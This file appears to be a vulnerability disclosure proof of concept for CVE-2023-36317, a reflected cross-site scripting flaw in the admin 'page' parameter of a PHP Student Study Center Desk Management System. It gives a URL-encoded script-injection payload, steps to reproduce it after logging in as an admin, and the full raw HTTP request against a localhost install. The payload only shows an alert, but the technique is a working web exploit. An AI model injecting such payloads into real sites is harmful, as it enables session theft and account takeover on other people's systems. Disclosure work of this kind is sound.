/
CVE-2023-36317
44 lines (32 loc) · 1.44 KB
/
CVE-2023-36317
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
# Exploit Title: Student Study Center Desk Management System - Cross-Site Scripting (XSS)
# Date: 17/06/2023
# Exploit Author: Ujjwal Saran
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code
# Version: V1.0.0
# Tested on: Windows
use payload=%2f'%3balert(document.domain)%2f%2f
1. visit-http://localhost/php-sscdms/admin/login.php
2. login Admin Doctor account with default credential
3. Click left on Students option
4. Put XSS payload in url on "Page" parameter
5. capture request and put payload
Request
GET /php-sscdms/admin/?page=%2f'%3balert(document.domain)%2f%2f HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/php-sscdms/admin/?page=assign
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=02kfvleeri3ami25pt1nk6mdlg
Connection: close